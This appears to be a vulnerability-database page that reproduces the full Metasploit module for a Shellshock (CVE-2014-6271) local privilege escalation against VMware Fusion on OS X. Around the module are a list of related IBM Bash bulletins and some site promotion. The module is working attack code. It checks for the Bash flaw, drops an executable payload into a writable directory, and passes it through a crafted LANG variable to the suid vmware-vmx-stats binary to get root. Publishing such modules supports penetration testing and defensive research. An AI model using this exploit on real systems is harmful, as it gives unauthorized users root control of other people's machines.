Lucene search
K

OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

🗓️ 24 Sep 2014 22:44:14Reported by Stephane Chazelas, juken, joev <[email protected]>, mubix <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 65 Views

OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock). Module exploits Shellshock vulnerability in Bash shell to target VMWare Fusion app for unprivileged user to gain root access

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
15 Jun 201807:01
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance
17 Jun 201822:30
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
19 Jul 202000:49
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
31 Jan 201901:35
ibm
IBM Security Bulletins
Security Bulletins for IBM Tealeaf Customer Experience offerings
16 Jun 201819:35
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Jun 201800:08
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
16 Jun 201813:58
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Oct 201903:50
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)
31 Jan 201901:30
ibm
IBM Security Bulletins
Security Bulletin: UPDATE: Vulnerabilities in Bash affect AIX Toolbox for Linux Applications (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)
15 Sep 202112:14
ibm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)',
      'Description'   => %q{
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets the VMWare Fusion
        application, allowing an unprivileged local user to get root access.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Stephane Chazelas', # discovered the bash bug
          'juken', # discovered the VMWare priv esc
          'joev', # msf module
          'mubix' # vmware-vmx-stats
        ],
      'References'    =>
        [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2014-09-24',
      'Notes' =>
          {
              'AKA' => ['Shellshock']
          }
    ))

    register_options [
      OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
    register_file_for_cleanup path
  end

  def check
    check_str = Rex::Text.rand_text_alphanumeric(5)
    # ensure they are vulnerable to bash env variable bug
    if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
       cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/

      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_file = "#{base_dir}/.#{Rex::Text::rand_text_alpha_lower(8..12)}"
    exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    upload payload_file, exe
    cmd_exec "chmod +x #{payload_file}"

    print_status 'Running VMWare services...'
    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.9Low risk
Vulners AI Score0.9
CVSS 210
CVSS 3.19.8
EPSS0.99999
65